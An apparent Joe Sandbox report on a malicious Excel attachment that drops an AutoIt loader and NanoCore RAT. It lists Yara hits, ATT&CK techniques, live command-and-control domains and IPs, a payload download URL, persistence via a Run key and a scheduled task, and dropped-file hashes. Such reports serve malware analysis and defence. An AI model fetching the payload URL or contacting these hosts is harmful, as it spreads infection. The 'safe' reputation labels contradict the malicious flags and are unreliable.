Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e02a4.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b02a4.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b02a4.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e48cd.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b48cd.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536291326.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_0101C06C OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_010265D3 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_01014EFB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts2	Native API1	DLL Side-Loading1	Exploitation for Privilege Escalation1	Disable or Modify Tools111	Input Capture31	System Time Discovery2	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Exploitation for Client Execution13	Valid Accounts2	DLL Side-Loading1	Deobfuscate/Decode Files or Information11	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Input Capture31	Exfiltration Over Bluetooth	Encrypted Channel11	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter3	Scheduled Task/Job1	Valid Accounts2	Obfuscated Files or Information2	Security Account Manager	File and Directory Discovery2	SMB/Windows Admin Shares	Clipboard Data2	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Scheduled Task/Job1	Logon Script (Mac)	Access Token Manipulation21	Software Packing12	NTDS	System Information Discovery37	Distributed Component Object Model	Input Capture	Scheduled Transfer	Remote Access Software1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Process Injection312	DLL Side-Loading1	LSA Secrets	Security Software Discovery121	SSH	Keylogging	Data Transfer Size Limits	Non-Application Layer Protocol2	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Scheduled Task/Job1	Masquerading211	Cached Domain Credentials	Virtualization/Sandbox Evasion31	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol213	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Valid Accounts2	DCSync	Process Discovery3	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Modify Registry1	Proc Filesystem	Application Window Discovery11	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Virtualization/Sandbox Evasion31	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Access Token Manipulation21	Network Sniffing	Remote System Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Process Injection312	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	Hidden Files and Directories1	Keylogging	Local Groups	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\33920049\mmuiqlcvwo.pif	27%	Virustotal		Browse
C:\Users\user\33920049\mmuiqlcvwo.pif	32%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
6.2.RegSvcs.exe.ae0000.4.unpack	100%	Avira	TR/NanoCore.fadte	Download File
6.2.RegSvcs.exe.340000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
13.2.RegSvcs.exe.2d0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
ezeani.duckdns.org	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://demopicking.renova-sa.net/asdERTYgh56F.exe	0%	Avira URL Cloud	safe
http://secure.globalsign.net/cacert/PrimObject.crt0	0%	URL Reputation	safe
http://secure.globalsign.net/cacert/ObjectSign.crt09	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.globalsign.net/repository09	0%	URL Reputation	safe
ezeani.duckdns.org	1%	Virustotal		Browse
ezeani.duckdns.org	0%	Avira URL Cloud	safe
194.5.98.48	1%	Virustotal		Browse
194.5.98.48	0%	Avira URL Cloud	safe
http://www.globalsign.net/repository/0	0%	URL Reputation	safe
http://www.globalsign.net/repository/03	0%	URL Reputation	safe
https://demopicking.renova-sa.net/asdERTYgh56F.exe	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ezeani.duckdns.org	194.5.98.48	true	true	1%, Virustotal, Browse	unknown
demopicking.renova-sa.net	97.107.138.110	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://demopicking.renova-sa.net/asdERTYgh56F.exe	true	Avira URL Cloud: safe	unknown
ezeani.duckdns.org	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
194.5.98.48	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://demopicking.renova-sa.net/asdERTYgh56F.exe	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://secure.globalsign.net/cacert/PrimObject.crt0	mmuiqlcvwo.pif.4.dr	false	URL Reputation: safe	unknown
http://secure.globalsign.net/cacert/ObjectSign.crt09	mmuiqlcvwo.pif.4.dr	false	URL Reputation: safe	unknown
http://www.%s.comPA	mmuiqlcvwo.pif, 00000005.00000002.666654547.0000000002F70000.00000002.00020000.sdmp, RegSvcs.exe, 00000006.00000002.667678750.0000000005C00000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.666152649.0000000001C10000.00000002.00020000.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666694262.0000000003150000.00000002.00020000.sdmp	false	URL Reputation: safe	low
http://www.globalsign.net/repository09	mmuiqlcvwo.pif.4.dr	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	mmuiqlcvwo.pif, 00000005.00000002.666654547.0000000002F70000.00000002.00020000.sdmp, RegSvcs.exe, 00000006.00000002.667678750.0000000005C00000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.666152649.0000000001C10000.00000002.00020000.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666694262.0000000003150000.00000002.00020000.sdmp	false		high
http://www.autoitscript.com/autoit3/0	mmuiqlcvwo.pif.4.dr	false		high
http://www.globalsign.net/repository/0	mmuiqlcvwo.pif.4.dr	false	URL Reputation: safe	unknown
http://www.globalsign.net/repository/03	mmuiqlcvwo.pif.4.dr	false	URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
194.5.98.48	ezeani.duckdns.org	Netherlands		208476	DANILENKODE	true
97.107.138.110	demopicking.renova-sa.net	United States		63949	LINODE-APLinodeLLCUS	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	501830
Start date:	13.10.2021
Start time:	09:58:13
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 51s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	Import order764536.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSX@16/49@20/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 28.4% (good quality ratio 27.2%) Quality average: 75.3% Quality standard deviation: 27.6%
HCA Information:	Successful, ratio: 62% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe TCP Packets have been reduced to 100 Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:58:35	API Interceptor	73x Sleep call for process: EQNEDT32.EXE modified
09:58:52	API Interceptor	5x Sleep call for process: vbc.exe modified
09:58:56	API Interceptor	671x Sleep call for process: mmuiqlcvwo.pif modified
09:58:58	API Interceptor	1355x Sleep call for process: RegSvcs.exe modified
09:58:59	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Windows element C:\Users\user\33920049\MMUIQL~1.PIF C:\Users\user\33920049\fmkkelc.omp
09:59:00	API Interceptor	2x Sleep call for process: schtasks.exe modified
09:59:01	Task Scheduler	Run new task: SMTP Service path: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" s>$(Arg0)
09:59:02	API Interceptor	446x Sleep call for process: taskeng.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
194.5.98.48	Bill of Lading, Invoice, & Packing LIsts.exe	Get hash	malicious	Browse
	Quotation Price - Double R Trading b.v.exe	Get hash	malicious	Browse
	Nizi International S.A. #New Order.exe	Get hash	malicious	Browse
	DHL Import Clearance #U2013 Consignment #6225954602.exe	Get hash	malicious	Browse
	soa5.exe	Get hash	malicious	Browse
	soa5.exe	Get hash	malicious	Browse
	PO SKP 149684.jar	Get hash	malicious	Browse
	TECHNICAL OFFERS.exe	Get hash	malicious	Browse
	17New P.O_signed.exe	Get hash	malicious	Browse
97.107.138.110	Doc7656.xlsx	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
LINODE-APLinodeLLCUS	triage_dropped_file.dll	Get hash	malicious	Browse	176.58.123.25
	sora.arm	Get hash	malicious	Browse	23.239.26.18
	038159.exe	Get hash	malicious	Browse	172.105.47.42
	pKD3j672HL.exe	Get hash	malicious	Browse	172.105.103.207
	DEUXRWq2W8.exe	Get hash	malicious	Browse	172.105.103.207
	09090.xlsx	Get hash	malicious	Browse	172.105.103.207
	SecuriteInfo.com.Suspicious.Win32.Save.a.20709.dll	Get hash	malicious	Browse	139.162.232.153
	SecuriteInfo.com.W32.AIDetect.malware2.3399.dll	Get hash	malicious	Browse	139.162.232.153
	SecuriteInfo.com.W32.AIDetect.malware2.25801.dll	Get hash	malicious	Browse	139.162.232.153
	SecuriteInfo.com.W32.AIDetect.malware2.27378.dll	Get hash	malicious	Browse	139.162.232.153
	SecuriteInfo.com.Suspicious.Win32.Save.a.20709.dll	Get hash	malicious	Browse	139.162.232.153
	SecuriteInfo.com.W32.AIDetect.malware2.3399.dll	Get hash	malicious	Browse	139.162.232.153
	SecuriteInfo.com.W32.AIDetect.malware2.25801.dll	Get hash	malicious	Browse	139.162.232.153
	SecuriteInfo.com.W32.AIDetect.malware2.27378.dll	Get hash	malicious	Browse	139.162.232.153
	1tfgyRM7yM.dll	Get hash	malicious	Browse	139.162.232.153
	UTYeDO7L2W.dll	Get hash	malicious	Browse	139.162.232.153
	1tfgyRM7yM.dll	Get hash	malicious	Browse	139.162.232.153
	UTYeDO7L2W.dll	Get hash	malicious	Browse	139.162.232.153
	8205108.exe	Get hash	malicious	Browse	172.105.103.207
	dAZVcn7rdL.exe	Get hash	malicious	Browse	172.104.94.112
DANILENKODE	swift.Telex.xls	Get hash	malicious	Browse	194.5.98.95
	details.vbs	Get hash	malicious	Browse	194.5.98.206
	TWAueCcfK3.exe	Get hash	malicious	Browse	194.5.98.107
	DHL_1012617429350,pdf.exe	Get hash	malicious	Browse	194.5.97.16
	Enquiry- 0076HGF21.exe	Get hash	malicious	Browse	194.5.98.141
	DHL_1012617429350,pdf.exe	Get hash	malicious	Browse	194.5.97.16
	1012617429350,pdf.exe	Get hash	malicious	Browse	194.5.97.16
	AWB# 2617429350,pdf.exe	Get hash	malicious	Browse	194.5.97.16
	Product-inquiry6243424243_PDF.exe	Get hash	malicious	Browse	194.5.98.211
	Charter Details.vbs	Get hash	malicious	Browse	194.5.98.184
	VHp0AIIlQG.exe	Get hash	malicious	Browse	194.5.98.107
	Product-inquiry6243424243PDF.exe	Get hash	malicious	Browse	194.5.98.211
	Yeni Sipari#U015f # 765-3523663, pdf.exe	Get hash	malicious	Browse	194.5.97.16
	Nuevo pedido _WJO-001,pdf.exe	Get hash	malicious	Browse	194.5.97.16
	765-3523663 ,pdf.exe	Get hash	malicious	Browse	194.5.97.16
	Zhgafxcfrzzlbcdvuklhrmxvmcufzxktju.exe	Get hash	malicious	Browse	194.5.98.145
	Zhgafxcfrzzlbcdvuklhrmxvmcufzxktju.exe	Get hash	malicious	Browse	194.5.98.145
	Yfqbmuahufznqznknlmwfrtnauqppwcobt.exe	Get hash	malicious	Browse	194.5.98.145
	BIOBARICA OC CVE6535 TVOP-MIO 10(C) 2021,pdf..exe	Get hash	malicious	Browse	194.5.97.25
	udI2NcR8Lj.exe	Get hash	malicious	Browse	194.5.97.128

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
7dcce5b76c8b17472d024758970a406b	art-1881052385.xls	Get hash	malicious	Browse	97.107.138.110
	JrZcKXgWcl.vbs	Get hash	malicious	Browse	97.107.138.110
	doc-379851424.xls	Get hash	malicious	Browse	97.107.138.110
	doc-220808714.xls	Get hash	malicious	Browse	97.107.138.110
	INV.ppt	Get hash	malicious	Browse	97.107.138.110
	Purchase Order .xlsx	Get hash	malicious	Browse	97.107.138.110
	MV JOLLY EXPRESS.docx	Get hash	malicious	Browse	97.107.138.110
	DHL_Delivery_Notification.doc	Get hash	malicious	Browse	97.107.138.110
	FedEx AWB 884174658339.doc	Get hash	malicious	Browse	97.107.138.110
	UPDATE INVOICE FM K & S INDUSTRY.docx	Get hash	malicious	Browse	97.107.138.110
	PO 347391.docx	Get hash	malicious	Browse	97.107.138.110
	swift.Telex.xls	Get hash	malicious	Browse	97.107.138.110
	Invoice number 1257MAJAKFVII2021 incl. VAT.doc	Get hash	malicious	Browse	97.107.138.110
	Consignment Notification.doc	Get hash	malicious	Browse	97.107.138.110
	RFQ87976VF.doc	Get hash	malicious	Browse	97.107.138.110
	RFQPTD0075453423.doc	Get hash	malicious	Browse	97.107.138.110
	F#U0130YAT TEKL#U0130F#U0130 FORMU.doc	Get hash	malicious	Browse	97.107.138.110
	CONTRACT 0902021.doc	Get hash	malicious	Browse	97.107.138.110
	PO006237_2nd Shipment.docx	Get hash	malicious	Browse	97.107.138.110
	sample.exe	Get hash	malicious	Browse	97.107.138.110

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\33920049\mmuiqlcvwo.pif	KRSEL0000056286.JPG.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\RegSvcs.exe	PI.xlsx	Get hash	malicious	Browse
	swift.xls	Get hash	malicious	Browse
	PENDING INVOICES.doc	Get hash	malicious	Browse
	RFQ-2201847.xlsx	Get hash	malicious	Browse
	Postal Financial Services.doc	Get hash	malicious	Browse
	85a3f6aa_by_Libranalysis.rtf	Get hash	malicious	Browse
	Files Specification.xlsx	Get hash	malicious	Browse
	Update of the OFFICE PACK.xlam	Get hash	malicious	Browse
	Quotation Assurance.doc	Get hash	malicious	Browse
	Update of the OFFICE PACK.doc	Get hash	malicious	Browse
	DHL Documents 7.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\33920049\aauo.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	512
Entropy (8bit):	5.6047097806645825
Encrypted:	false
SSDEEP:	12:o9RRQXCGiB+IGihOZEkUYz8laDkucQq1wA3RT8jTW:oPRuCh8OEZEdwkucZ1w2T8jS
MD5:	3A48081CF7D4D709399A376B3A8AADF2
SHA1:	E0D7DDAA464FC3565D92DF4ECC7BD30286D519CA
SHA-256:	7EBB903522348C2326DFFBC66B5D20C8E7C120C4D7CEE15640CAE5187C5741C0
SHA-512:	4B0077AD1E29FC4C7703B7525167ABB1A80E409D7E4685EA977689B3DE12CF5CFA02BB843D62E1EA391F18FF4C609D66262116E01B52C59616E3A266F0E40726
Malicious:	false
Reputation:	low
Preview:	7Wq2t660muPw9Ke6505108Nqr733V3ey4715Mnl1tK584..xy2u6f8997C1l72Xc9877f5666UgJI88f50gM5PSiht354AzpPmC0fL6TsXG1K41vO4Dkm9..46tjB20c7LBG210W860g694jFP6918666lmHe1c7XI71YIljgi5hp12J0oQ690a15cD60yD7KVgw047u4j6A41klBxn2Ok2L386Lb22mMFoB69F2..P213L3BW17Qa6OT37d10A3N36J105N6dvVEJiz4h0aj833P18x910LvnZ655s06IFlBf63Gu5HKO28ErrHC5b09mo2vq..z4D72VM..Sz42896scdb7kPgw0qW6q81vF8..0D5lF..m4zAR10BO6Yk8M..5BGR826P42tCT1t73Hk261Pcqliz7AoTir59j..661Qb74gOprMNMaV9FBPR0TzEQ6H92poW22LHCzotRBEn3R97T2So4F0113007zgj459pt6JBRy1w4p8HlK..

C:\Users\user\33920049\abjtjj.gcm Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	416786
Entropy (8bit):	4.0000117868606
Encrypted:	false
SSDEEP:	6144:vq8GcfPnL6mYkonW8inBO9SEmDafe/kgtwIf:vecfPemYZWJs9NmDaW8gmG
MD5:	1E44C5E2D839F53AC114916DFA41912B
SHA1:	9B67ABC94E2959683B5D784C8B076D6171AF7237
SHA-256:	0FB93824D410F1E4BA2B233F405027D042EDF2E729FA34A41BE910B50ED99416
SHA-512:	14895D2F67585415D7D25807BBA20F6AA8C142E8DD3483ED8E10F4280820CD0849EE828E3134BEAF4A90FB8E41C9C524DF01547330DFD3928470B3EEB95946A1
Malicious:	false
Preview:	263C9AF54DD4BF4F7E0C5198D2227687C93C7661722FE3BF313F3C309BC6DA5B7DCF8CC2FD93519BEEA48BC3F85F444A4DC6F35EE0C7421245FE1ED29C939140AA744D02294CC3133D1C4574F4178BD44CABBB3E1D4DECD39B635890338BB701862A32E1DF18C77C1467AFA0EE1A1C0E2FE212F58868971A359F1A0051337BA3E49B4186689F644914CC0532EE1E2191D02B5E967124EFC714F108E42312A57BB206933E0D80F0CE85016C65EF6DEF77E6D282FEDA01C7C5E87E75884D5A2A071F0DAD2F068C403C58342FBB1992E8429411FBC7D211702D5B2CC25840B6745D5C4DCD998E61535598AB03F837F91DACF69F1A8AB681C1844FFB4E72BA0239829E8F3869CC79BAC6D3FFB9D0B99DF07443F914D0114D8E543D012146B2FBEC7553587031F90693C06F307664E5579F5452330E0CDED3F23714F20E723C950FC3ED17E97CECB51E98E8DB4CC1FC9BB79E0373AC4964FD9AB88DE32AEECEF0EF35F9C084A95125E1075C7930534E78DF5AD151E0E61ED15DE7C3CFDA715AE279046B90370787F52959A2A2EBDC6291A89D9CAA296B7EDEAE91A9695B2B35498AB1161165F6FB3C07DF2A46F51CBA870B02A83E0DEB4AD17E5FD212878466CFDCA81948E75C1B58BF293B55CC6C7D17EBADD267142649CB9C7D745346164549A751534E975FE2AE562BE19C67669A149FC6FA4F74F3

C:\Users\user\33920049\aricevnrq.msc Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	605
Entropy (8bit):	5.421101092464615
Encrypted:	false
SSDEEP:	12:/wP7JBvQ76cFT1DeNWO+9EjcJujbW/e8Rz9ZoPgIA6+1mpkfwLD:/gJBQzF0NWlvmEeYBmgI7+1qLD
MD5:	AE35EB6B3B57EEB5BED5821AA2E6D92D
SHA1:	9D8C94DEF5AE1D05D727E19EFF0A55917094DD67
SHA-256:	565B05521D79388A417C7210739CFC5EB4F8E41E50D0D76D6710FE7533FF4B98
SHA-512:	7A1F352907FA7D9BA4B414331EF15B9CDE5949744CA7BB47EF5AE68D03391512E80308DF06B82B4FF54746C3A06EF9A2E590CE7331BC9107EB66CE257F73FB63
Malicious:	false
Preview:	08Z3h01TYEDB7juv33IVTN5363Bm3x58X99O3qk6hF7UILvA93I5x2B34m55pQbb86qi61jSmmo01y7L78Gwfs9C56D785gw679242F1769ed446vL0jU59bEkk5..1395w9H2420o41EHZ37Q5H625u59KgkGl4KJluL189E3l40DpWwl4h7TMm76R29z5b96tsEc5j6DiN0..vZ06s6R0Y4d0yWO1..4w156A660bZ5wtP8wq8CQk08f56Y0434Ke2w16Fb34b123Xy8172qUfZGDs18wBj3H22yc456ZNg39Htm4t8Ht1C..0pOZe952HYIt0eiF989Ha59NxD930kMRbd46n2oJ99C0nZ844U18X5t5W989E3U3t751387Y57308372635fg3AgBF77355T8m19upI7tk5g8kp854rBT451470..07L1594RI53310x74fd3QH8Y28a6b..n321hoQ..14EY338q0CU1353Bi29mK5aLq46FR5g62fKj027u487718wB49X72539654H1904u67y65v0541Dvh3577feFfN3UBF27ie2zx9Jf50r66194x7h4Z3r895w8Lo..

C:\Users\user\33920049\bbofcjswrb.bmp Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	510
Entropy (8bit):	5.395393519734533
Encrypted:	false
SSDEEP:	12:gIhpZX8zRyjfRafC1Pmu/r6V7w5TSKocSZVjjkrK+zlEVBIy:gIhpV89ESeFp2xVjAG+zl0BF
MD5:	152ACD87F50B620928B85D1F6EA00588
SHA1:	5A704ED20090C635BC28A71A343FFF741F482D06
SHA-256:	B8F8B30B8BFDFE6E4EBA9D663264F8DE1FEC9A94B1530E0DC13001953324DDEE
SHA-512:	CB312CF46E681121EF1B75F723405FC5A0C243AD44E027F115DDF578E8B639B080127FA133FE69D3367983CEA1677879276F3BABD89B5DD904F5528545E4C6E2
Malicious:	false
Preview:	h2d4pGf54q2132P42FX65o8122rw2M3584rBd5j277l6g409G48j794253kT80z6470FejY94Dw56HJi347A2d332d4uTYn75X96o340J4iE822y4dc5D4304zhwy0w6is08ur6600cqe259OHm2157u48UI99..jGj2b8N89e24f771RD59L8oR83p5d304m1u74w420ABk2706a6LiN0pdSCl673r..S9k2NF75MmH737cH45o9t2JmF04Yuj6wr23X340r01375VJRod..47ztV9lZ6642J9T86nN11ama6680j741Zy74850R526m7foe8N36q6XO74z8l8sE77..a0oP0Tm3J014NEBb612H6LEj31ZgMPw592740nm95n4uGP65f9SkpNzJ8D8fN..64728i4M47R06Tx796zShlGl0dy4fF70doY6Pc1k6mMnk1YQL81Ehqueh0T6j9026XNNyOO8gsZTL6c059e2wRe702ye39u115W2..

C:\Users\user\33920049\dngb.txt Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	628
Entropy (8bit):	5.539990812470243
Encrypted:	false
